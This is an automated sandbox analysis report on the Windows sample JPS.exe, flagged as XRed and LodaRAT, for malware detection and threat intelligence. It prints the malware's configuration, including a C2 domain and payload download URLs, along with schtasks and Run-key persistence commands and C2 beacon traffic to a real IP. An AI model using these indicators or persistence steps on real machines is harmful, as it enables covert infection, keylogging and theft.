Windows Analysis Report
JPS.exe

Overview

General Information

Sample name: JPS.exe
Analysis ID: 1582339
MD5: 290a46d2614f4ce4f7ad75d2cea2ce23
SHA1: cc9f762b21f649252881087b2ff56e88d4b5a6f1
SHA256: 7cbe965fa1278ba09c31e191c19ac1e2b52f940b656273872c805833ae03e276
Tags: exeknkbkk212user-JAMESWT_MHT

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • JPS.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\JPS.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
    • ._cache_JPS.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\._cache_JPS.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
      • cmd.exe (PID: 7708 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7800 cmdline: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7732 cmdline: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7604 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
      • WerFault.exe (PID: 8284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7648 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • XNLAGO.exe (PID: 7956 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • Synaptics.exe (PID: 2888 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
  • XNLAGO.exe (PID: 7484 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8292 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8332 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8644 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: JPS.exe, Rule: JoeSecurity_XRed, Description: Yara detected XRed, Author: Joe Security
Source: JPS.exe, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security

Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Author: Joe Security
Source: C:\ProgramData\Synaptics\RCX5246.tmp, Rule: JoeSecurity_XRed, Description: Yara detected XRed, Author: Joe Security
Source: C:\ProgramData\Synaptics\RCX5246.tmp, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security
Source: C:\Users\user\Documents\~$cache1, Rule: JoeSecurity_XRed, Description: Yara detected XRed, Author: Joe Security
Source: C:\Users\user\Documents\~$cache1, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security

Source: 00000002.00000002.2564672501.00000000040E6000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Author: Joe Security
Source: 00000007.00000002.2555561177.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Author: Joe Security
Source: 00000007.00000002.2554418377.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Author: Joe Security
Source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_XRed, Description: Yara detected XRed, Author: Joe Security
Source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security

Source: 0.0.JPS.exe.400000.0.unpack, Rule: JoeSecurity_XRed, Description: Yara detected XRed, Author: Joe Security
Source: 0.0.JPS.exe.400000.0.unpack, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security

System Summary

Source: Network Connection, Author: Florian Roth (Nextron Systems), Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_JPS.exe, Initiated: true, ProcessId: 7544, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49797
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_JPS.exe, ProcessId: 7544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BQQQVU
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_JPS.exe, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ProcessId: 7800, ProcessName: schtasks.exe
Source: Process started, Author: Michael Haag, Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JPS.exe, ProcessId: 7448, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7604, TargetFilename: C:\Users\user\AppData\Local\Temp\J6UTCx7N.xlsm
AV Detection

Source: JPS.exe, Avira: detected
Source: http://xred.site50.net/syn/SSLLibrary.dlp, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.iniH), Avira URL Cloud: Label: malware
Source: C:\ProgramData\Synaptics\RCX5246.tmp, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX5246.tmp, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\~$cache1, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: JPS.exe, Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCX5246.tmp, ReversingLabs: Detection: 92%
Source: C:\ProgramData\Synaptics\Synaptics.exe, ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe, ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\._cache_JPS.exe, ReversingLabs: Detection: 68%
Source: C:\Users\user\Documents\~$cache1, ReversingLabs: Detection: 92%
Source: JPS.exe, Virustotal: Detection: 85%
Source: JPS.exe, ReversingLabs: Detection: 92%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 98.3% probability
Source: C:\ProgramData\Synaptics\RCX5246.tmp, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\._cache_JPS.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Documents\~$cache1, Joe Sandbox ML: detected
Source: JPS.exe, Joe Sandbox ML: detected
Source: JPS.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: JPS.exe, 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: JPS.exe, 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: JPS.exeBinary or memory string: [autorun]
                              Source: JPS.exeBinary or memory string: autorun.inf
                              Source: RCX5246.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX5246.tmp.0.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AADD92
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE2044
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE219F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00AE24A9
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00AD6B3F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00AD6E4A
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00ADF350
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00ADFDD2
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADFD47 FindFirstFileW,FindClose,2_2_00ADFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00782044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00782044
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0078219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0078219F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007824A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_007824A9
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00776B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00776B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00776E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00776E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0077F350
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077FD47 FindFirstFileW,FindClose,10_2_0077FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0077FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074DD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_0074DD92
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 69MB

                              Networking

                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.11:49769 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.11:49797 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:49797 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:49903 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50009 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50102 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.11:50136 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50136 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50140 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50141 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50144 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.11:50148 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50148 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50149 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50147 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50150 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50151 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49845 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49761 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49825 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49776 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49788 -> 172.217.18.110:443
